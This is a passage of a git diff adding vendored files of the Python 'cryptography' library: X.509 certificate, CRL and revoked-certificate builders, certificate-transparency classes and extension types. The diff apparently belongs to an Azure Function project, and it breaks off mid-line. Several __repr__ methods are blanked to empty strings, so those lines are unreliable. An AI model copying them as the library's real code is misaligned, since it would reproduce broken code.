"CertificateBuilder": + """ + Sets the certificate expiration time. + """ + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._not_valid_after is not None: + raise ValueError("The not valid after may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The not valid after date must be on or after" + " 1950 January 1." + ) + if ( + self._not_valid_before is not None + and time < self._not_valid_before + ): + raise ValueError( + "The not valid after date must be after the not valid before " + "date." + ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + time, + self._extensions, + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateBuilder": + """ + Adds an X.509 extension to the certificate. + """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions + [extension], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> Certificate: + """ + Signs the certificate using the CA's private key. + """ + if self._subject_name is None: + raise ValueError("A certificate must have a subject name") + + if self._issuer_name is None: + raise ValueError("A certificate must have an issuer name") + + if self._serial_number is None: + raise ValueError("A certificate must have a serial number") + + if self._not_valid_before is None: + raise ValueError("A certificate must have a not valid before time") + + if self._not_valid_after is None: + raise ValueError("A certificate must have a not valid after time") + + if self._public_key is None: + raise ValueError("A certificate must have a public key") + + return rust_x509.create_x509_certificate(self, private_key, algorithm) + + +class CertificateRevocationListBuilder: + _extensions: typing.List[Extension[ExtensionType]] + _revoked_certificates: typing.List[RevokedCertificate] + + def __init__( + self, + issuer_name: typing.Optional[Name] = None, + last_update: typing.Optional[datetime.datetime] = None, + next_update: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + revoked_certificates: typing.List[RevokedCertificate] = [], + ): + self._issuer_name = issuer_name + self._last_update = last_update + self._next_update = next_update + self._extensions = extensions + self._revoked_certificates = revoked_certificates + + def issuer_name( + self, issuer_name: Name + ) -> "CertificateRevocationListBuilder": + if not isinstance(issuer_name, Name): + raise TypeError("Expecting x509.Name object.") + if self._issuer_name is not None: + raise ValueError("The issuer name may only be set once.") + return CertificateRevocationListBuilder( + issuer_name, + self._last_update, + self._next_update, + self._extensions, + self._revoked_certificates, + ) + + def last_update( + self, last_update: datetime.datetime + ) -> "CertificateRevocationListBuilder": + if not isinstance(last_update, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._last_update is not None: + raise ValueError("Last update may only be set once.") + last_update = _convert_to_naive_utc_time(last_update) + if last_update < _EARLIEST_UTC_TIME: + raise ValueError( + "The last update date must be on or after" " 1950 January 1." + ) + if self._next_update is not None and last_update > self._next_update: + raise ValueError( + "The last update date must be before the next update date." + ) + return CertificateRevocationListBuilder( + self._issuer_name, + last_update, + self._next_update, + self._extensions, + self._revoked_certificates, + ) + + def next_update( + self, next_update: datetime.datetime + ) -> "CertificateRevocationListBuilder": + if not isinstance(next_update, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._next_update is not None: + raise ValueError("Last update may only be set once.") + next_update = _convert_to_naive_utc_time(next_update) + if next_update < _EARLIEST_UTC_TIME: + raise ValueError( + "The last update date must be on or after" " 1950 January 1." + ) + if self._last_update is not None and next_update < self._last_update: + raise ValueError( + "The next update date must be after the last update date." + ) + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + next_update, + self._extensions, + self._revoked_certificates, + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateRevocationListBuilder": + """ + Adds an X.509 extension to the certificate revocation list. + """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + self._next_update, + self._extensions + [extension], + self._revoked_certificates, + ) + + def add_revoked_certificate( + self, revoked_certificate: RevokedCertificate + ) -> "CertificateRevocationListBuilder": + """ + Adds a revoked certificate to the CRL. + """ + if not isinstance(revoked_certificate, RevokedCertificate): + raise TypeError("Must be an instance of RevokedCertificate") + + return CertificateRevocationListBuilder( + self._issuer_name, + self._last_update, + self._next_update, + self._extensions, + self._revoked_certificates + [revoked_certificate], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> CertificateRevocationList: + if self._issuer_name is None: + raise ValueError("A CRL must have an issuer name") + + if self._last_update is None: + raise ValueError("A CRL must have a last update time") + + if self._next_update is None: + raise ValueError("A CRL must have a next update time") + + return rust_x509.create_x509_crl(self, private_key, algorithm) + + +class RevokedCertificateBuilder: + def __init__( + self, + serial_number: typing.Optional[int] = None, + revocation_date: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + ): + self._serial_number = serial_number + self._revocation_date = revocation_date + self._extensions = extensions + + def serial_number(self, number: int) -> "RevokedCertificateBuilder": + if not isinstance(number, int): + raise TypeError("Serial number must be of integral type.") + if self._serial_number is not None: + raise ValueError("The serial number may only be set once.") + if number <= 0: + raise ValueError("The serial number should be positive") + + # ASN.1 integers are always signed, so most significant bit must be + # zero. + if number.bit_length() >= 160: # As defined in RFC 5280 + raise ValueError( + "The serial number should not be more than 159 " "bits." + ) + return RevokedCertificateBuilder( + number, self._revocation_date, self._extensions + ) + + def revocation_date( + self, time: datetime.datetime + ) -> "RevokedCertificateBuilder": + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._revocation_date is not None: + raise ValueError("The revocation date may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The revocation date must be on or after" " 1950 January 1." + ) + return RevokedCertificateBuilder( + self._serial_number, time, self._extensions + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "RevokedCertificateBuilder": + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + return RevokedCertificateBuilder( + self._serial_number, + self._revocation_date, + self._extensions + [extension], + ) + + def build(self, backend: typing.Any = None) -> RevokedCertificate: + if self._serial_number is None: + raise ValueError("A revoked certificate must have a serial number") + if self._revocation_date is None: + raise ValueError( + "A revoked certificate must have a revocation date" + ) + return _RawRevokedCertificate( + self._serial_number, + self._revocation_date, + Extensions(self._extensions), + ) + + +def random_serial_number() -> int: + return int.from_bytes(os.urandom(20), "big") >> 1 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py new file mode 100644 index 0000000..eacdb34 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/certificate_transparency.py @@ -0,0 +1,48 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import datetime + +from cryptography import utils +from cryptography.hazmat.bindings._rust import x509 as rust_x509 + + +class LogEntryType(utils.Enum): + X509_CERTIFICATE = 0 + PRE_CERTIFICATE = 1 + + +class Version(utils.Enum): + v1 = 0 + + +class SignedCertificateTimestamp(metaclass=abc.ABCMeta): + @abc.abstractproperty + def version(self) -> Version: + """ + Returns the SCT version. + """ + + @abc.abstractproperty + def log_id(self) -> bytes: + """ + Returns an identifier indicating which log this SCT is for. + """ + + @abc.abstractproperty + def timestamp(self) -> datetime.datetime: + """ + Returns the timestamp for this SCT. + """ + + @abc.abstractproperty + def entry_type(self) -> LogEntryType: + """ + Returns whether this is an SCT for a certificate or pre-certificate. + """ + + +SignedCertificateTimestamp.register(rust_x509.Sct) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py new file mode 100644 index 0000000..784a080 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/extensions.py @@ -0,0 +1,2103 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import datetime +import hashlib +import ipaddress +import typing + +from cryptography import utils +from cryptography.hazmat.bindings._rust import asn1 +from cryptography.hazmat.bindings._rust import x509 as rust_x509 +from cryptography.hazmat.primitives import constant_time, serialization +from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey +from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + CERTIFICATE_PUBLIC_KEY_TYPES, +) +from cryptography.x509.certificate_transparency import ( + SignedCertificateTimestamp, +) +from cryptography.x509.general_name import ( + DNSName, + DirectoryName, + GeneralName, + IPAddress, + OtherName, + RFC822Name, + RegisteredID, + UniformResourceIdentifier, + _IPADDRESS_TYPES, +) +from cryptography.x509.name import Name, RelativeDistinguishedName +from cryptography.x509.oid import ( + CRLEntryExtensionOID, + ExtensionOID, + OCSPExtensionOID, + ObjectIdentifier, +) + +ExtensionTypeVar = typing.TypeVar( + "ExtensionTypeVar", bound="ExtensionType", covariant=True +) + + +def _key_identifier_from_public_key( + public_key: CERTIFICATE_PUBLIC_KEY_TYPES, +) -> bytes: + if isinstance(public_key, RSAPublicKey): + data = public_key.public_bytes( + serialization.Encoding.DER, + serialization.PublicFormat.PKCS1, + ) + elif isinstance(public_key, EllipticCurvePublicKey): + data = public_key.public_bytes( + serialization.Encoding.X962, + serialization.PublicFormat.UncompressedPoint, + ) + else: + # This is a very slow way to do this. + serialized = public_key.public_bytes( + serialization.Encoding.DER, + serialization.PublicFormat.SubjectPublicKeyInfo, + ) + data = asn1.parse_spki_for_data(serialized) + + return hashlib.sha1(data).digest() + + +def _make_sequence_methods(field_name: str): + def len_method(self) -> int: + return len(getattr(self, field_name)) + + def iter_method(self): + return iter(getattr(self, field_name)) + + def getitem_method(self, idx): + return getattr(self, field_name)[idx] + + return len_method, iter_method, getitem_method + + +class DuplicateExtension(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(DuplicateExtension, self).__init__(msg) + self.oid = oid + + +class ExtensionNotFound(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(ExtensionNotFound, self).__init__(msg) + self.oid = oid + + +class ExtensionType(metaclass=abc.ABCMeta): + oid: typing.ClassVar[ObjectIdentifier] + + def public_bytes(self) -> bytes: + """ + Serializes the extension type to DER. + """ + raise NotImplementedError( + "public_bytes is not implemented for extension type {0!r}".format( + self + ) + ) + + +class Extensions: + def __init__( + self, extensions: typing.Iterable["Extension[ExtensionType]"] + ) -> None: + self._extensions = list(extensions) + + def get_extension_for_oid( + self, oid: ObjectIdentifier + ) -> "Extension[ExtensionType]": + for ext in self: + if ext.oid == oid: + return ext + + raise ExtensionNotFound("No {} extension was found".format(oid), oid) + + def get_extension_for_class( + self, extclass: typing.Type[ExtensionTypeVar] + ) -> "Extension[ExtensionTypeVar]": + if extclass is UnrecognizedExtension: + raise TypeError( + "UnrecognizedExtension can't be used with " + "get_extension_for_class because more than one instance of the" + " class may be present." + ) + + for ext in self: + if isinstance(ext.value, extclass): + return ext + + raise ExtensionNotFound( + "No {} extension was found".format(extclass), extclass.oid + ) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_extensions") + + def __repr__(self) -> str: + return "".format(self._extensions) + + +class CRLNumber(ExtensionType): + oid = ExtensionOID.CRL_NUMBER + + def __init__(self, crl_number: int) -> None: + if not isinstance(crl_number, int): + raise TypeError("crl_number must be an integer") + + self._crl_number = crl_number + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CRLNumber): + return NotImplemented + + return self.crl_number == other.crl_number + + def __hash__(self) -> int: + return hash(self.crl_number) + + def __repr__(self) -> str: + return "".format(self.crl_number) + + @property + def crl_number(self) -> int: + return self._crl_number + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AuthorityKeyIdentifier(ExtensionType): + oid = ExtensionOID.AUTHORITY_KEY_IDENTIFIER + + def __init__( + self, + key_identifier: typing.Optional[bytes], + authority_cert_issuer: typing.Optional[typing.Iterable[GeneralName]], + authority_cert_serial_number: typing.Optional[int], + ) -> None: + if (authority_cert_issuer is None) != ( + authority_cert_serial_number is None + ): + raise ValueError( + "authority_cert_issuer and authority_cert_serial_number " + "must both be present or both None" + ) + + if authority_cert_issuer is not None: + authority_cert_issuer = list(authority_cert_issuer) + if not all( + isinstance(x, GeneralName) for x in authority_cert_issuer + ): + raise TypeError( + "authority_cert_issuer must be a list of GeneralName " + "objects" + ) + + if authority_cert_serial_number is not None and not isinstance( + authority_cert_serial_number, int + ): + raise TypeError("authority_cert_serial_number must be an integer") + + self._key_identifier = key_identifier + self._authority_cert_issuer = authority_cert_issuer + self._authority_cert_serial_number = authority_cert_serial_number + + # This takes a subset of CERTIFICATE_PUBLIC_KEY_TYPES because an issuer + # cannot have an X25519/X448 key. This introduces some unfortunate + # asymmetry that requires typing users to explicitly + # narrow their type, but we should make this accurate and not just + # convenient. + @classmethod + def from_issuer_public_key( + cls, public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES + ) -> "AuthorityKeyIdentifier": + digest = _key_identifier_from_public_key(public_key) + return cls( + key_identifier=digest, + authority_cert_issuer=None, + authority_cert_serial_number=None, + ) + + @classmethod + def from_issuer_subject_key_identifier( + cls, ski: "SubjectKeyIdentifier" + ) -> "AuthorityKeyIdentifier": + return cls( + key_identifier=ski.digest, + authority_cert_issuer=None, + authority_cert_serial_number=None, + ) + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AuthorityKeyIdentifier): + return NotImplemented + + return ( + self.key_identifier == other.key_identifier + and self.authority_cert_issuer == other.authority_cert_issuer + and self.authority_cert_serial_number + == other.authority_cert_serial_number + ) + + def __hash__(self) -> int: + if self.authority_cert_issuer is None: + aci = None + else: + aci = tuple(self.authority_cert_issuer) + return hash( + (self.key_identifier, aci, self.authority_cert_serial_number) + ) + + @property + def key_identifier(self) -> typing.Optional[bytes]: + return self._key_identifier + + @property + def authority_cert_issuer( + self, + ) -> typing.Optional[typing.List[GeneralName]]: + return self._authority_cert_issuer + + @property + def authority_cert_serial_number(self) -> typing.Optional[int]: + return self._authority_cert_serial_number + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class SubjectKeyIdentifier(ExtensionType): + oid = ExtensionOID.SUBJECT_KEY_IDENTIFIER + + def __init__(self, digest: bytes) -> None: + self._digest = digest + + @classmethod + def from_public_key( + cls, public_key: CERTIFICATE_PUBLIC_KEY_TYPES + ) -> "SubjectKeyIdentifier": + return cls(_key_identifier_from_public_key(public_key)) + + @property + def digest(self) -> bytes: + return self._digest + + @property + def key_identifier(self) -> bytes: + return self._digest + + def __repr__(self) -> str: + return "".format(self.digest) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SubjectKeyIdentifier): + return NotImplemented + + return constant_time.bytes_eq(self.digest, other.digest) + + def __hash__(self) -> int: + return hash(self.digest) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AuthorityInformationAccess(ExtensionType): + oid = ExtensionOID.AUTHORITY_INFORMATION_ACCESS + + def __init__( + self, descriptions: typing.Iterable["AccessDescription"] + ) -> None: + descriptions = list(descriptions) + if not all(isinstance(x, AccessDescription) for x in descriptions): + raise TypeError( + "Every item in the descriptions list must be an " + "AccessDescription" + ) + + self._descriptions = descriptions + + __len__, __iter__, __getitem__ = _make_sequence_methods("_descriptions") + + def __repr__(self) -> str: + return "".format(self._descriptions) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AuthorityInformationAccess): + return NotImplemented + + return self._descriptions == other._descriptions + + def __hash__(self) -> int: + return hash(tuple(self._descriptions)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class SubjectInformationAccess(ExtensionType): + oid = ExtensionOID.SUBJECT_INFORMATION_ACCESS + + def __init__( + self, descriptions: typing.Iterable["AccessDescription"] + ) -> None: + descriptions = list(descriptions) + if not all(isinstance(x, AccessDescription) for x in descriptions): + raise TypeError( + "Every item in the descriptions list must be an " + "AccessDescription" + ) + + self._descriptions = descriptions + + __len__, __iter__, __getitem__ = _make_sequence_methods("_descriptions") + + def __repr__(self) -> str: + return "".format(self._descriptions) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, SubjectInformationAccess): + return NotImplemented + + return self._descriptions == other._descriptions + + def __hash__(self) -> int: + return hash(tuple(self._descriptions)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class AccessDescription: + def __init__( + self, access_method: ObjectIdentifier, access_location: GeneralName + ) -> None: + if not isinstance(access_method, ObjectIdentifier): + raise TypeError("access_method must be an ObjectIdentifier") + + if not isinstance(access_location, GeneralName): + raise TypeError("access_location must be a GeneralName") + + self._access_method = access_method + self._access_location = access_location + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, AccessDescription): + return NotImplemented + + return ( + self.access_method == other.access_method + and self.access_location == other.access_location + ) + + def __hash__(self) -> int: + return hash((self.access_method, self.access_location)) + + @property + def access_method(self) -> ObjectIdentifier: + return self._access_method + + @property + def access_location(self) -> GeneralName: + return self._access_location + + +class BasicConstraints(ExtensionType): + oid = ExtensionOID.BASIC_CONSTRAINTS + + def __init__(self, ca: bool, path_length: typing.Optional[int]) -> None: + if not isinstance(ca, bool): + raise TypeError("ca must be a boolean value") + + if path_length is not None and not ca: + raise ValueError("path_length must be None when ca is False") + + if path_length is not None and ( + not isinstance(path_length, int) or path_length < 0 + ): + raise TypeError( + "path_length must be a non-negative integer or None" + ) + + self._ca = ca + self._path_length = path_length + + @property + def ca(self) -> bool: + return self._ca + + @property + def path_length(self) -> typing.Optional[int]: + return self._path_length + + def __repr__(self) -> str: + return ( + "" + ).format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, BasicConstraints): + return NotImplemented + + return self.ca == other.ca and self.path_length == other.path_length + + def __hash__(self) -> int: + return hash((self.ca, self.path_length)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class DeltaCRLIndicator(ExtensionType): + oid = ExtensionOID.DELTA_CRL_INDICATOR + + def __init__(self, crl_number: int) -> None: + if not isinstance(crl_number, int): + raise TypeError("crl_number must be an integer") + + self._crl_number = crl_number + + @property + def crl_number(self) -> int: + return self._crl_number + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DeltaCRLIndicator): + return NotImplemented + + return self.crl_number == other.crl_number + + def __hash__(self) -> int: + return hash(self.crl_number) + + def __repr__(self) -> str: + return "".format(self) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class CRLDistributionPoints(ExtensionType): + oid = ExtensionOID.CRL_DISTRIBUTION_POINTS + + def __init__( + self, distribution_points: typing.Iterable["DistributionPoint"] + ) -> None: + distribution_points = list(distribution_points) + if not all( + isinstance(x, DistributionPoint) for x in distribution_points + ): + raise TypeError( + "distribution_points must be a list of DistributionPoint " + "objects" + ) + + self._distribution_points = distribution_points + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_distribution_points" + ) + + def __repr__(self) -> str: + return "".format(self._distribution_points) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CRLDistributionPoints): + return NotImplemented + + return self._distribution_points == other._distribution_points + + def __hash__(self) -> int: + return hash(tuple(self._distribution_points)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class FreshestCRL(ExtensionType): + oid = ExtensionOID.FRESHEST_CRL + + def __init__( + self, distribution_points: typing.Iterable["DistributionPoint"] + ) -> None: + distribution_points = list(distribution_points) + if not all( + isinstance(x, DistributionPoint) for x in distribution_points + ): + raise TypeError( + "distribution_points must be a list of DistributionPoint " + "objects" + ) + + self._distribution_points = distribution_points + + __len__, __iter__, __getitem__ = _make_sequence_methods( + "_distribution_points" + ) + + def __repr__(self) -> str: + return "".format(self._distribution_points) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, FreshestCRL): + return NotImplemented + + return self._distribution_points == other._distribution_points + + def __hash__(self) -> int: + return hash(tuple(self._distribution_points)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class DistributionPoint: + def __init__( + self, + full_name: typing.Optional[typing.Iterable[GeneralName]], + relative_name: typing.Optional[RelativeDistinguishedName], + reasons: typing.Optional[typing.FrozenSet["ReasonFlags"]], + crl_issuer: typing.Optional[typing.Iterable[GeneralName]], + ) -> None: + if full_name and relative_name: + raise ValueError( + "You cannot provide both full_name and relative_name, at " + "least one must be None." + ) + + if full_name is not None: + full_name = list(full_name) + if not all(isinstance(x, GeneralName) for x in full_name): + raise TypeError( + "full_name must be a list of GeneralName objects" + ) + + if relative_name: + if not isinstance(relative_name, RelativeDistinguishedName): + raise TypeError( + "relative_name must be a RelativeDistinguishedName" + ) + + if crl_issuer is not None: + crl_issuer = list(crl_issuer) + if not all(isinstance(x, GeneralName) for x in crl_issuer): + raise TypeError( + "crl_issuer must be None or a list of general names" + ) + + if reasons and ( + not isinstance(reasons, frozenset) + or not all(isinstance(x, ReasonFlags) for x in reasons) + ): + raise TypeError("reasons must be None or frozenset of ReasonFlags") + + if reasons and ( + ReasonFlags.unspecified in reasons + or ReasonFlags.remove_from_crl in reasons + ): + raise ValueError( + "unspecified and remove_from_crl are not valid reasons in a " + "DistributionPoint" + ) + + if reasons and not crl_issuer and not (full_name or relative_name): + raise ValueError( + "You must supply crl_issuer, full_name, or relative_name when " + "reasons is not None" + ) + + self._full_name = full_name + self._relative_name = relative_name + self._reasons = reasons + self._crl_issuer = crl_issuer + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DistributionPoint): + return NotImplemented + + return ( + self.full_name == other.full_name + and self.relative_name == other.relative_name + and self.reasons == other.reasons + and self.crl_issuer == other.crl_issuer + ) + + def __hash__(self) -> int: + if self.full_name is not None: + fn: typing.Optional[typing.Tuple[GeneralName, ...]] = tuple( + self.full_name + ) + else: + fn = None + + if self.crl_issuer is not None: + crl_issuer: typing.Optional[ + typing.Tuple[GeneralName, ...] + ] = tuple(self.crl_issuer) + else: + crl_issuer = None + + return hash((fn, self.relative_name, self.reasons, crl_issuer)) + + @property + def full_name(self) -> typing.Optional[typing.List[GeneralName]]: + return self._full_name + + @property + def relative_name(self) -> typing.Optional[RelativeDistinguishedName]: + return self._relative_name + + @property + def reasons(self) -> typing.Optional[typing.FrozenSet["ReasonFlags"]]: + return self._reasons + + @property + def crl_issuer(self) -> typing.Optional[typing.List[GeneralName]]: + return self._crl_issuer + + +class ReasonFlags(utils.Enum): + unspecified = "unspecified" + key_compromise = "keyCompromise" + ca_compromise = "cACompromise" + affiliation_changed = "affiliationChanged" + superseded = "superseded" + cessation_of_operation = "cessationOfOperation" + certificate_hold = "certificateHold" + privilege_withdrawn = "privilegeWithdrawn" + aa_compromise = "aACompromise" + remove_from_crl = "removeFromCRL" + + +# These are distribution point bit string mappings. Not to be confused with +# CRLReason reason flags bit string mappings. +# ReasonFlags ::= BIT STRING { +# unused (0), +# keyCompromise (1), +# cACompromise (2), +# affiliationChanged (3), +# superseded (4), +# cessationOfOperation (5), +# certificateHold (6), +# privilegeWithdrawn (7), +# aACompromise (8) } +_REASON_BIT_MAPPING = { + 1: ReasonFlags.key_compromise, + 2: ReasonFlags.ca_compromise, + 3: ReasonFlags.affiliation_changed, + 4: ReasonFlags.superseded, + 5: ReasonFlags.cessation_of_operation, + 6: ReasonFlags.certificate_hold, + 7: ReasonFlags.privilege_withdrawn, + 8: ReasonFlags.aa_compromise, +} + + +class PolicyConstraints(ExtensionType): + oid = ExtensionOID.POLICY_CONSTRAINTS + + def __init__( + self, + require_explicit_policy: typing.Optional[int], + inhibit_policy_mapping: typing.Optional[int], + ) -> None: + if require_explicit_policy is not None and not isinstance( + require_explicit_policy, int + ): + raise TypeError( + "require_explicit_policy must be a non-negative integer or " + "None" + ) + + if inhibit_policy_mapping is not None and not isinstance( + inhibit_policy_mapping, int + ): + raise TypeError( + "inhibit_policy_mapping must be a non-negative integer or None" + ) + + if inhibit_policy_mapping is None and require_explicit_policy is None: + raise ValueError( + "At least one of require_explicit_policy and " + "inhibit_policy_mapping must not be None" + ) + + self._require_explicit_policy = require_explicit_policy + self._inhibit_policy_mapping = inhibit_policy_mapping + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PolicyConstraints): + return NotImplemented + + return ( + self.require_explicit_policy == other.require_explicit_policy + and self.inhibit_policy_mapping == other.inhibit_policy_mapping + ) + + def __hash__(self) -> int: + return hash( + (self.require_explicit_policy, self.inhibit_policy_mapping) + ) + + @property + def require_explicit_policy(self) -> typing.Optional[int]: + return self._require_explicit_policy + + @property + def inhibit_policy_mapping(self) -> typing.Optional[int]: + return self._inhibit_policy_mapping + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class CertificatePolicies(ExtensionType): + oid = ExtensionOID.CERTIFICATE_POLICIES + + def __init__(self, policies: typing.Iterable["PolicyInformation"]) -> None: + policies = list(policies) + if not all(isinstance(x, PolicyInformation) for x in policies): + raise TypeError( + "Every item in the policies list must be a " + "PolicyInformation" + ) + + self._policies = policies + + __len__, __iter__, __getitem__ = _make_sequence_methods("_policies") + + def __repr__(self) -> str: + return "".format(self._policies) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CertificatePolicies): + return NotImplemented + + return self._policies == other._policies + + def __hash__(self) -> int: + return hash(tuple(self._policies)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class PolicyInformation: + def __init__( + self, + policy_identifier: ObjectIdentifier, + policy_qualifiers: typing.Optional[ + typing.Iterable[typing.Union[str, "UserNotice"]] + ], + ) -> None: + if not isinstance(policy_identifier, ObjectIdentifier): + raise TypeError("policy_identifier must be an ObjectIdentifier") + + self._policy_identifier = policy_identifier + + if policy_qualifiers is not None: + policy_qualifiers = list(policy_qualifiers) + if not all( + isinstance(x, (str, UserNotice)) for x in policy_qualifiers + ): + raise TypeError( + "policy_qualifiers must be a list of strings and/or " + "UserNotice objects or None" + ) + + self._policy_qualifiers = policy_qualifiers + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, PolicyInformation): + return NotImplemented + + return ( + self.policy_identifier == other.policy_identifier + and self.policy_qualifiers == other.policy_qualifiers + ) + + def __hash__(self) -> int: + if self.policy_qualifiers is not None: + pq: typing.Optional[ + typing.Tuple[typing.Union[str, "UserNotice"], ...] + ] = tuple(self.policy_qualifiers) + else: + pq = None + + return hash((self.policy_identifier, pq)) + + @property + def policy_identifier(self) -> ObjectIdentifier: + return self._policy_identifier + + @property + def policy_qualifiers( + self, + ) -> typing.Optional[typing.List[typing.Union[str, "UserNotice"]]]: + return self._policy_qualifiers + + +class UserNotice: + def __init__( + self, + notice_reference: typing.Optional["NoticeReference"], + explicit_text: typing.Optional[str], + ) -> None: + if notice_reference and not isinstance( + notice_reference, NoticeReference + ): + raise TypeError( + "notice_reference must be None or a NoticeReference" + ) + + self._notice_reference = notice_reference + self._explicit_text = explicit_text + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, UserNotice): + return NotImplemented + + return ( + self.notice_reference == other.notice_reference + and self.explicit_text == other.explicit_text + ) + + def __hash__(self) -> int: + return hash((self.notice_reference, self.explicit_text)) + + @property + def notice_reference(self) -> typing.Optional["NoticeReference"]: + return self._notice_reference + + @property + def explicit_text(self) -> typing.Optional[str]: + return self._explicit_text + + +class NoticeReference: + def __init__( + self, + organization: typing.Optional[str], + notice_numbers: typing.Iterable[int], + ) -> None: + self._organization = organization + notice_numbers = list(notice_numbers) + if not all(isinstance(x, int) for x in notice_numbers): + raise TypeError("notice_numbers must be a list of integers") + + self._notice_numbers = notice_numbers + + def __repr__(self) -> str: + return ( + "".format(self) + ) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, NoticeReference): + return NotImplemented + + return ( + self.organization == other.organization + and self.notice_numbers == other.notice_numbers + ) + + def __hash__(self) -> int: + return hash((self.organization, tuple(self.notice_numbers))) + + @property + def organization(self) -> typing.Optional[str]: + return self._organization + + @property + def notice_numbers(self) -> typing.List[int]: + return self._notice_numbers + + +class ExtendedKeyUsage(ExtensionType): + oid = ExtensionOID.EXTENDED_KEY_USAGE + + def __init__(self, usages: typing.Iterable[ObjectIdentifier]) -> None: + usages = list(usages) + if not all(isinstance(x, ObjectIdentifier) for x in usages): + raise TypeError( + "Every item in the usages list must be an ObjectIdentifier" + ) + + self._usages = usages + + __len__, __iter__, __getitem__ = _make_sequence_methods("_usages") + + def __repr__(self) -> str: + return "".format(self._usages) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, ExtendedKeyUsage): + return NotImplemented + + return self._usages == other._usages + + def __hash__(self) -> int: + return hash(tuple(self._usages)) + + def public_bytes(self) -> bytes: + return rust_x509.encode_extension_value(self) + + +class OCSPNoCheck(ExtensionType): + oid = 